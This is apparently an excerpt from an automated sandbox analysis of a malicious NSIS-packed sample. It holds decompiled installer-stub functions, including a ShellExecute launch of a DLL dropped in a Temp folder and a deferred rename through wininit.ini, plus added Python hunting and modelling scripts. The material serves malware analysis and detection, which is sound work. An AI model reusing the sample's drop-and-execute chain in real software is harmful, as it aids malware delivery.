	if(_t18 + lstrlenA( *(_t35 + 8)) < 0x3fd) {
		lstrcatA(0x40a018, 0x40901c);	/* separator string at 0x40901c */
		lstrcatA(0x40a018,  *(_t35 - 8));
	}
	if(MoveFileA( *(_t35 + 8),  *(_t35 - 8)) == 0) {
		/* rename failed: if the "rename on reboot" flag is clear or the source does not exist
		   (E00405C94 = FindFirstFileA probe), record an error in the local at [ebp-4] */
		if( *((intOrPtr*)(_t35 - 0x1c)) == _t28 || E00405C94( *(_t35 + 8)) == 0) {
			*((intOrPtr*)(_t35 - 4)) = 1;
		} else {
			/* E00405707 queues the rename in %WINDIR%\wininit.ini for completion at next boot */
			E00405707( *(_t35 + 8),  *(_t35 - 8));
			_push(0xffffffe4);	/* log string id for the deferred rename */
			goto L7;
		}
	} else {
		_push(0xffffffe3);	/* log string id for the completed rename */
		L7:
		E00401428();	/* emit log line */
	}
	*0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t35 - 4));	/* accumulate the error counter */
	return 0;
}

                                                                              APIs
                                                                                • Part of subcall function 004059BF: lstrcpynA.KERNEL32(?,?,00000400,0040319C,007A2780,NSIS Error), ref: 004059CC
                                                                              • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\nsvE792.tmp\6oxdti6l9qd.dll,?,000000DF,000000D0), ref: 00401690
                                                                              • lstrlenA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsvE792.tmp\6oxdti6l9qd.dll,?,000000DF,000000D0), ref: 0040169A
                                                                              • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsvE792.tmp\6oxdti6l9qd.dll,0040901C,?,?,C:\Users\user\AppData\Local\Temp\nsvE792.tmp\6oxdti6l9qd.dll,?,000000DF,000000D0), ref: 004016AF
                                                                              • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsvE792.tmp\6oxdti6l9qd.dll,?,C:\Users\user\AppData\Local\Temp\nsvE792.tmp\6oxdti6l9qd.dll,0040901C,?,?,C:\Users\user\AppData\Local\Temp\nsvE792.tmp\6oxdti6l9qd.dll,?,000000DF,000000D0), ref: 004016B8
                                                                                • Part of subcall function 00405C94: SetErrorMode.KERNELBASE(00008001,00000000,007A0988,C:\Users\user\AppData\Local\Temp\,004055EF,007A0988,007A0988,00000000,007A0988,007A0988,?,?,00000000,00405315,?,"C:\Users\user\Desktop\NdBLyH2h5d.exe" ), ref: 00405CA2
                                                                                • Part of subcall function 00405C94: FindFirstFileA.KERNELBASE(?,007A15D0), ref: 00405CAE
                                                                                • Part of subcall function 00405C94: SetErrorMode.KERNELBASE(00000000), ref: 00405CB8
                                                                                • Part of subcall function 00405C94: FindClose.KERNELBASE(00000000), ref: 00405CC0
                                                                                • Part of subcall function 00405707: CloseHandle.KERNEL32(00000000,?,00000000,00000001,KERNEL32.dll,MoveFileExA,?,00000000,?,?,004054BC,?,00000000,000000F1,?), ref: 0040575C
                                                                                • Part of subcall function 00405707: GetShortPathNameA.KERNEL32 ref: 00405765
                                                                                • Part of subcall function 00405707: GetShortPathNameA.KERNEL32 ref: 00405782
                                                                                • Part of subcall function 00405707: wsprintfA.USER32 ref: 004057A0
                                                                                • Part of subcall function 00405707: GetWindowsDirectoryA.KERNEL32(007A1188,000003F0,?,?,00000000,000000F1,?), ref: 004057B1
                                                                                • Part of subcall function 00405707: lstrcatA.KERNEL32(007A1188,\wininit.ini,?,?,00000000,000000F1,?), ref: 004057BD
                                                                                • Part of subcall function 00405707: CreateFileA.KERNEL32(007A1188,C0000000,00000000,00000000,00000004,08000080,00000000,007A1188,\wininit.ini,?,?,00000000,000000F1,?), ref: 004057D4
                                                                                • Part of subcall function 00405707: GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,000000F1,?), ref: 004057E8
                                                                                • Part of subcall function 00405707: GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004057F7
                                                                                • Part of subcall function 00405707: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 0040580D
                                                                              • MoveFileA.KERNEL32 ref: 004016C3
                                                                              Strings
                                                                              Memory Dump Source
• Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp
• Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp
• Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp
• Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp
• Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp
• Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp
• Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp
• Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp
• Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp
                                                                              Similarity
                                                                              • API ID: File$lstrcat$CloseErrorFindModeNamePathShortlstrlen$AllocCreateDirectoryFirstGlobalHandleMoveReadSizeWindowslstrcpynwsprintf
                                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsvE792.tmp\6oxdti6l9qd.dll
                                                                              • API String ID: 2621199633-483980473
                                                                              • Opcode ID: e34dedb074c22f8b75bca2a446b82d177209b2bfd9f99b0c9f35470352dc7494
                                                                              • Instruction ID: fea5f1e5da9c35cb7cab6b6f1408056446a07f0d4044b317f115ce8379a8f22b
                                                                              • Opcode Fuzzy Hash: e34dedb074c22f8b75bca2a446b82d177209b2bfd9f99b0c9f35470352dc7494
                                                                              • Instruction Fuzzy Hash: 7D11A031904214FBCF016FA2CD0899E3A62EF41368F20413BF401751E1DA3D8A81AF5D
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              C-Code - Quality: 100%
/* Analyst note (inferred from the message numbers, not from the report): a tree-view helper.
   With _a8 == 0 it returns the state of the selected item; otherwise it hit-tests the current
   mouse position and returns the state of the item under the cursor, or -1 if none.
   0x110a = TVM_GETNEXTITEM, 0x110c = TVM_GETITEMA, 0x1111 = TVM_HITTEST. */
E00404627(struct HWND__* _a4, intOrPtr _a8) {
	long _v8;		/* TVHITTESTINFO.hItem */
	signed char _v12;	/* TVHITTESTINFO.flags (TVHT_*) */
	unsigned int _v16;	/* TVHITTESTINFO.pt.y */
	void* _v20;		/* TVHITTESTINFO.pt.x */
	intOrPtr _v24;		/* TVITEM.state */
	long _v56;		/* TVITEM.hItem */
	void* _v60;		/* TVITEM.mask */
	long _t15;
	unsigned int _t19;
	signed int _t25;
	struct HWND__* _t28;

	_t28 = _a4;
	_t15 = SendMessageA(_t28, 0x110a, 9, 0);	/* TVM_GETNEXTITEM, TVGN_CARET (9): selected item */
	if(_a8 == 0) {
		L4:
		_v56 = _t15;
		_v60 = 4;	/* TVIF_STATE */
		SendMessageA(_t28, 0x110c, 0,  &_v60);	/* TVM_GETITEMA fills in the state field */
		return _v24;
	}
	/* split the packed cursor position (low word x, high word y) and convert to client coordinates */
	_t19 = GetMessagePos();
	_v16 = _t19 >> 0x10;
	_v20 = _t19;
	ScreenToClient(_t28,  &_v20);
	_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);	/* TVM_HITTEST */
	if((_v12 & 0x00000066) != 0) {
		/* cursor is over an item (icon, label, state icon or right of the label): query its state */
		_t15 = _v8;
		goto L4;
	}
	return _t25 | 0xffffffff;	/* nothing hit: -1 */
}

                                                                              APIs
                                                                              • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404642
                                                                              • GetMessagePos.USER32 ref: 0040464A
                                                                              • ScreenToClient.USER32 ref: 00404664
                                                                              • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404676
                                                                              • SendMessageA.USER32(?,0000110C,00000000,?), ref: 0040469C
                                                                              Strings
                                                                              Memory Dump Source
• Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp
• Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp
• Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp
• Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp
• Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp
• Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp
• Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp
• Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp
• Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp
                                                                              Similarity
                                                                              • API ID: Message$Send$ClientScreen
                                                                              • String ID: f
                                                                              • API String ID: 41195575-1993550816
                                                                              • Opcode ID: a62ee4c6f8744dddd87d0a1d61b58e140f64d2c7e8211fa38f6ec5a760cc9808
                                                                              • Instruction ID: cc273b5f7af9833ca02a78eb85435134e40410870e31f3474614dd8078ab484b
                                                                              • Opcode Fuzzy Hash: a62ee4c6f8744dddd87d0a1d61b58e140f64d2c7e8211fa38f6ec5a760cc9808
                                                                              • Instruction Fuzzy Hash: 0A015271D00218BADB00DB94DC85BFFBBBCAB55711F10412BBB00B62C0D7B869418BA5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              C-Code - Quality: 100%
                                                                              			E00402BAB(struct HWND__* _a4, intOrPtr _a8, CHAR* _a16) {
                                                                              				int _t7;
                                                                              				int _t15;
                                                                              				struct HWND__* _t16;
                                                                              
                                                                              				_t16 = _a4;
                                                                              				if(_a8 == 0x110) {
                                                                              					SetTimer(_t16, 1, 0xfa, 0);
                                                                              					_a8 = 0x113;
                                                                              					 *0x40b020 = _a16;
                                                                              				}
                                                                              				if(_a8 == 0x113) {
                                                                              					_t15 =  *0x789930; // 0x32903
                                                                              					_t7 =  *0x79d938; // 0x32907
                                                                              					if(_t15 >= _t7) {
                                                                              						_t15 = _t7;
                                                                              					}
                                                                              					wsprintfA(0x7898f0,  *0x40b020, MulDiv(_t15, 0x64, _t7));
                                                                              					SetWindowTextA(_t16, 0x7898f0);
                                                                              					SetDlgItemTextA(_t16, 0x406, 0x7898f0);
                                                                              					ShowWindow(_t16, 5);
                                                                              				}
                                                                              				return 0;
                                                                              			}

                                                                              APIs
                                                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402BCB
                                                                              • MulDiv.KERNEL32(00032903,00000064,00032907), ref: 00402BF6
                                                                              • wsprintfA.USER32 ref: 00402C09
                                                                              • SetWindowTextA.USER32(?,007898F0), ref: 00402C14
                                                                              • SetDlgItemTextA.USER32 ref: 00402C21
                                                                              • ShowWindow.USER32(?,00000005,?,00000406,007898F0), ref: 00402C29
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp
                                                                              Similarity
                                                                              • API ID: TextWindow$ItemShowTimerwsprintf
                                                                              • String ID:
                                                                              • API String ID: 559026099-0
                                                                              • Opcode ID: 6bb25f70a1653d38713b2b3ce1117d23bb5b874e0913eb29b27a21d06f6436fe
                                                                              • Instruction ID: fbe1f7977b8df494303572dcbb2cbc4cea34e2fcb0be9a91995bb721301161c2
                                                                              • Opcode Fuzzy Hash: 6bb25f70a1653d38713b2b3ce1117d23bb5b874e0913eb29b27a21d06f6436fe
                                                                              • Instruction Fuzzy Hash: F0017531940214ABD7116F15AD49FBB3B68EB45721F00403AFA05B62D0D7B86851DBA9
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              C-Code - Quality: 64%
                                                                              			E00401E34() {
                                                                              				signed int _t7;
                                                                              				void* _t19;
                                                                              				char* _t20;
                                                                              				signed int _t24;
                                                                              				void* _t26;
                                                                              
                                                                              				_t24 = E00402A9A(_t19);
                                                                              				_t20 = E00402A9A(0x31);
                                                                              				_t7 = E00402A9A(0x22);
                                                                              				_push(_t20);
                                                                              				_push(_t24);
                                                                              				_t22 = _t7;
                                                                              				wsprintfA("C:\Users\hardz\AppData\Local\Temp\nsvE792.tmp\6oxdti6l9qd.dll", "%s %s");
                                                                              				E00401428(0xffffffec);
                                                                              				asm("sbb eax, eax");
                                                                              				asm("sbb eax, eax");
                                                                              				if(ShellExecuteA( *(_t26 - 8),  ~( *_t24) & _t24, _t20,  ~( *_t7) & _t22, "C:\\Users\\hardz\\AppData\\Local\\Temp",  *(_t26 - 0x18)) < 0x21) {
                                                                              					 *((intOrPtr*)(_t26 - 4)) = 1;
                                                                              				}
                                                                              				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t26 - 4));
                                                                              				return 0;
                                                                              			}

                                                                              APIs
                                                                              • wsprintfA.USER32 ref: 00401E5A
                                                                              • ShellExecuteA.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Local\Temp,?), ref: 00401E88
                                                                              Strings
                                                                              • %s %s, xrefs: 00401E4E
                                                                              • C:\Users\user\AppData\Local\Temp, xrefs: 00401E73
                                                                              • C:\Users\user\AppData\Local\Temp\nsvE792.tmp\6oxdti6l9qd.dll, xrefs: 00401E53
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp
                                                                              Similarity
                                                                              • API ID: ExecuteShellwsprintf
                                                                              • String ID: %s %s$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsvE792.tmp\6oxdti6l9qd.dll
                                                                              • API String ID: 2956387742-1368271051
                                                                              • Opcode ID: 05d836665ae50fce2707af320b19060b42cd68dfbfcf627df7f78d71aa10da7e
                                                                              • Instruction ID: ce03d906cf3866787b37d6904cdbd79c6318199a3569b7a51aa2d89d7359fd60
                                                                              • Opcode Fuzzy Hash: 05d836665ae50fce2707af320b19060b42cd68dfbfcf627df7f78d71aa10da7e
                                                                              • Instruction Fuzzy Hash: ADF0F471B042006EC711AFB59D4EE6E3AA8DB42319B200837F001F61D3D5BD88519768
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%
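
The decompiled E00401E34 above hands a verb, a file and a parameter string to ShellExecuteA with the user's Temp directory as the working directory, and the buffer captured in the dump holds a DLL path under Temp\nsvE792.tmp. That ns<letter><4 hex>.tmp directory is the naming an NSIS installer uses for the plugin directory it unpacks at run time, so the routine is the installer stub's ExecShell rather than FormBook itself; what matters for detection is anything executed out of such a directory. The following hunting script is an added example written for this page, not code from the report or from the sample. It assumes Sysmon-style key=value process-creation events with the field names Image, CommandLine and ParentImage, the ns<letter><4 hex>.tmp naming pattern (generalised from the single nsvE792.tmp seen here), and a small set of DLL-hosting binaries; every log line in it is constructed.

```python
"""Hunt for programs launched out of an NSIS plugin directory.

Added example, not part of the report or of the analysed sample. The field
names (Image, CommandLine, ParentImage) follow Sysmon-style process-creation
events; the SAMPLE_LOG lines are constructed, not captured.
"""
import re

# Assumption: NSIS names its plugin directory ns<letter><4 hex digits>.tmp
# under the user's Temp directory (this report shows nsvE792.tmp).
NSIS_TMP_DIR = re.compile(r"\\Temp\\ns[a-z][0-9a-f]{4}\.tmp\\", re.IGNORECASE)

# Assumption: common hosts that make a DLL "run" from a command line.
DLL_HOSTS = re.compile(r"(?:^|\\)(rundll32|regsvr32|odbcconf)\.exe$", re.IGNORECASE)

# Key=value or Key="quoted value" tokens.
FIELD = re.compile(r'(\w+)=("(?:[^"]*)"|\S+)')


def parse_event(line):
    """Turn 'Key=value Key2="quoted value"' into a dict of stripped values."""
    return {k: v.strip('"') for k, v in FIELD.findall(line)}


def classify(event):
    """Return a reason string if the event looks like NSIS-stage execution, else None."""
    image = event.get("Image", "")
    cmd = event.get("CommandLine", "")
    parent = event.get("ParentImage", "")
    if NSIS_TMP_DIR.search(image):
        return "image runs from NSIS plugin dir"
    if NSIS_TMP_DIR.search(cmd) and DLL_HOSTS.search(image):
        return "DLL from NSIS plugin dir loaded via " + image.rsplit("\\", 1)[-1]
    if NSIS_TMP_DIR.search(cmd) or NSIS_TMP_DIR.search(parent):
        return "command line or parent references NSIS plugin dir"
    return None


def find_nsis_temp_execs(lines):
    """Return (line number, image, reason) for every event that matches."""
    hits = []
    for number, line in enumerate(lines, 1):
        event = parse_event(line)
        reason = classify(event)
        if reason:
            hits.append((number, event.get("Image", ""), reason))
    return hits


# Constructed sample events; paths are modelled on this report, not copied from its traces.
SAMPLE_LOG = [
    r'Image=C:\Users\user\Desktop\NdBLyH2h5d.exe CommandLine="C:\Users\user\Desktop\NdBLyH2h5d.exe" ParentImage=C:\Windows\explorer.exe',
    r'Image=C:\Windows\System32\rundll32.exe CommandLine="rundll32.exe C:\Users\user\AppData\Local\Temp\nsvE792.tmp\6oxdti6l9qd.dll,Start" ParentImage=C:\Users\user\Desktop\NdBLyH2h5d.exe',
    r'Image=C:\Windows\System32\notepad.exe CommandLine=notepad.exe ParentImage=C:\Windows\explorer.exe',
    r'Image=C:\Users\user\AppData\Local\Temp\nsa1234.tmp\helper.exe CommandLine=helper.exe ParentImage=C:\Users\user\Downloads\setup.exe',
]

if __name__ == "__main__":
    for number, image, reason in find_nsis_temp_execs(SAMPLE_LOG):
        print(f"line {number}: {image}: {reason}")
```

Executing from an ns*.tmp directory is also what thousands of legitimate NSIS installers do with their plugins, so treat a hit as a pivot to be combined with the parent process, the signer of the installer and the other behaviours on this page rather than as a verdict on its own.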

                                                                              C-Code - Quality: 100%
                                                                              			E00402ADA(void* _a4, char* _a8, intOrPtr _a12) {
                                                                              				void* _v8;
                                                                              				char _v272;
                                                                              				long _t14;
                                                                              
                                                                              				_t14 = RegOpenKeyExA(_a4, _a8, 0, 8,  &_v8);
                                                                              				if(_t14 == 0) {
                                                                              					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
                                                                              						if(_a12 != 0) {
                                                                              							RegCloseKey(_v8);
                                                                              							return 1;
                                                                              						}
                                                                              						if(E00402ADA(_v8,  &_v272, 0) != 0) {
                                                                              							break;
                                                                              						}
                                                                              					}
                                                                              					RegCloseKey(_v8);
                                                                              					return RegDeleteKeyA(_a4, _a8);
                                                                              				}
                                                                              				return _t14;
                                                                              			}

                                                                              APIs
                                                                              • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000008,?), ref: 00402AF5
                                                                              • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402B31
                                                                              • RegCloseKey.ADVAPI32(?), ref: 00402B3A
                                                                              • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B46
                                                                              • RegCloseKey.ADVAPI32(?), ref: 00402B56
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp
                                                                              Similarity
                                                                              • API ID: Close$DeleteEnumOpen
                                                                              • String ID:
                                                                              • API String ID: 1912718029-0
                                                                              • Opcode ID: 0ec0c72ac22d197f92e3eb34b47e7c738ded362e1e52db29065c5b2891b64f43
                                                                              • Instruction ID: 075d0217e77777f9092c7514f2922301dec465e9e1858cbb0099f988ba13f04e
                                                                              • Opcode Fuzzy Hash: 0ec0c72ac22d197f92e3eb34b47e7c738ded362e1e52db29065c5b2891b64f43
                                                                              • Instruction Fuzzy Hash: 02012572900108FFDB21AF90DE88DAF7B7DEB44384F108572BA01A10A0D7B4AE55AB65
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%
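
The decompiled E00402ADA above opens a key with KEY_ENUMERATE_SUB_KEYS (0x8), enumerates index 0 repeatedly, recurses into each subkey with the third argument cleared, and only then calls RegDeleteKeyA on the key itself; when the third argument is non-zero it instead returns 1 as soon as any subkey exists. That is the shape of a recursive "delete key" helper with an "only if empty" mode, which (given the nsvE792.tmp path elsewhere on this page) is most likely the NSIS installer runtime's own code rather than the payload. The model below is an added example written for this page, not code from the report or from the sample: it reproduces the control flow on an in-memory dictionary standing in for a hive, because the Win32 calls only exist on Windows and RegDeleteKeyA will not delete a key that still has children. The hive contents, the helper names and the ERROR_ACCESS_DENIED choice for the "still has subkeys" case are assumptions.

```python
"""Model of the recursive registry-key deletion decompiled as E00402ADA.

Added example, not the sample's or the report's code. An in-memory dict
stands in for a registry hive so the control flow can be run anywhere.
"""

ERROR_SUCCESS = 0
ERROR_FILE_NOT_FOUND = 2
ERROR_ACCESS_DENIED = 5


def make_hive():
    """Constructed stand-in for a hive: each key is a dict of its subkeys.

    Values are omitted because the decompiled routine never touches them.
    """
    return {
        "Software": {
            "Vendor": {
                "App": {"Settings": {}, "Cache": {"Tmp": {}}},
                "Other": {},
            }
        }
    }


def _open(hive, path):
    """RegOpenKeyExA analogue: resolve 'A\\B\\C' to (parent dict, leaf name)."""
    parts = path.split("\\")
    node = hive
    for part in parts[:-1]:
        if part not in node:
            return None, None
        node = node[part]
    return node, parts[-1]


def delete_key(hive, path, only_if_empty=False):
    """Mirror of E00402ADA(hkey, subkey, flag).

    flag (_a12) non-zero turns the call into a probe: 1 is returned as soon
    as any subkey exists and nothing is deleted. With flag == 0 the routine
    recurses into every subkey first, because RegDeleteKeyA refuses to
    delete a key that still has children.
    """
    parent, name = _open(hive, path)
    if parent is None or name not in parent:
        return ERROR_FILE_NOT_FOUND            # RegOpenKeyExA failed
    subkeys = parent[name]
    # The decompiled loop calls RegEnumKeyA(_v8, 0, ...) with index 0 every
    # time: each recursive call removes that subkey, so index 0 advances to
    # the next one until the key is empty and enumeration fails.
    while subkeys:
        child = next(iter(subkeys))
        if only_if_empty:
            return 1                           # "not empty" probe result
        if delete_key(hive, path + "\\" + child, False) != ERROR_SUCCESS:
            break
    if subkeys:
        # Assumption: a key with surviving subkeys cannot be deleted and
        # Windows reports that from RegDeleteKeyA as ERROR_ACCESS_DENIED.
        return ERROR_ACCESS_DENIED
    del parent[name]                           # RegDeleteKeyA(hkey, subkey)
    return ERROR_SUCCESS
```

Two details worth keeping in mind when reading the original: the 0x105-byte name buffer (_v272) is one byte more than the 260-character maximum of a key path, and the recursion always passes 0 as the flag, so an "only if empty" request only inspects the top-level key.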

                                                                              C-Code - Quality: 100%
                                                                              			E00401D32() {
                                                                              				void* _t18;
                                                                              				struct HINSTANCE__* _t22;
                                                                              				struct HWND__* _t25;
                                                                              				void* _t27;
                                                                              
                                                                              				_t25 = GetDlgItem( *(_t27 - 8),  *(_t27 - 0x20));
                                                                              				GetClientRect(_t25, _t27 - 0x40);
                                                                              				_t18 = SendMessageA(_t25, 0x172, _t22, LoadImageA(_t22, E00402A9A(_t22), _t22,  *(_t27 - 0x38) *  *(_t27 - 0x1c),  *(_t27 - 0x34) *  *(_t27 - 0x1c), 0x10));
                                                                              				if(_t18 != _t22) {
                                                                              					DeleteObject(_t18);
                                                                              				}
                                                                              				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t27 - 4));
                                                                              				return 0;
                                                                              			}

                                                                              APIs
                                                                              • GetDlgItem.USER32 ref: 00401D38
                                                                              • GetClientRect.USER32 ref: 00401D45
                                                                              • LoadImageA.USER32 ref: 00401D66
                                                                              • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D74
                                                                              • DeleteObject.GDI32(00000000), ref: 00401D83
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp
                                                                              Similarity
                                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                              • String ID:
                                                                              • API String ID: 1849352358-0
                                                                              • Opcode ID: dac48a23ca69c3059e9ed47d02cf7cf39d3eefcb1fcb610c0a571ddde2ae894b
                                                                              • Instruction ID: 24e3e63a5c7369e1328c4ed5f53ad3de25e73d2730998e74081e515a34f76845
                                                                              • Opcode Fuzzy Hash: dac48a23ca69c3059e9ed47d02cf7cf39d3eefcb1fcb610c0a571ddde2ae894b
                                                                              • Instruction Fuzzy Hash: 7DF0FFB2A04115BFDB01DBE4EE88DAF77BDEB08311B105466F601F6191C7789D418B29
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              C-Code - Quality: 35%
                                                                              			E00404545(int _a4, intOrPtr _a8, unsigned int _a12) {
                                                                              				char _v36;
                                                                              				char _v68;
                                                                              				void* __ebx;
                                                                              				void* __edi;
                                                                              				void* __esi;
                                                                              				void* _t26;
                                                                              				void* _t34;
                                                                              				signed int _t36;
                                                                              				signed int _t39;
                                                                              				unsigned int _t46;
                                                                              
                                                                              				_t46 = _a12;
                                                                              				_push(0x14);
                                                                              				_pop(0);
                                                                              				_t34 = 0xffffffdc;
                                                                              				if(_t46 < 0x100000) {
                                                                              					_push(0xa);
                                                                              					_pop(0);
                                                                              					_t34 = 0xffffffdd;
                                                                              				}
                                                                              				if(_t46 < 0x400) {
                                                                              					_t34 = 0xffffffde;
                                                                              				}
                                                                              				if(_t46 < 0xffff3333) {
                                                                              					_t39 = 0x14;
                                                                              					asm("cdq");
                                                                              					_t46 = _t46 + 1 / _t39;
                                                                              				}
                                                                              				_push(E004059E1(_t34, 0, _t46,  &_v36, 0xffffffdf));
                                                                              				_push(E004059E1(_t34, 0, _t46,  &_v68, _t34));
                                                                              				_t21 = _t46 & 0x00ffffff;
                                                                              				_t36 = 0xa;
                                                                              				_push(((_t46 & 0x00ffffff) + _t21 * 4 + (_t46 & 0x00ffffff) + _t21 * 4 >> 0) % _t36);
                                                                              				_push(_t46 >> 0);
                                                                              				_t26 = E004059E1(_t34, 0, 0x79f580, 0x79f580, _a8);
                                                                              				wsprintfA(_t26 + lstrlenA(0x79f580), "%u.%u%s%s");
                                                                              				return SetDlgItemTextA( *0x7a2758, _a4, 0x79f580);
                                                                              			}

                                                                              APIs
                                                                              • lstrlenA.KERNEL32(0079F580,0079F580,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404465,000000DF,?,00000000,00000400), ref: 004045D3
                                                                              • wsprintfA.USER32 ref: 004045DB
                                                                              • SetDlgItemTextA.USER32 ref: 004045EE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
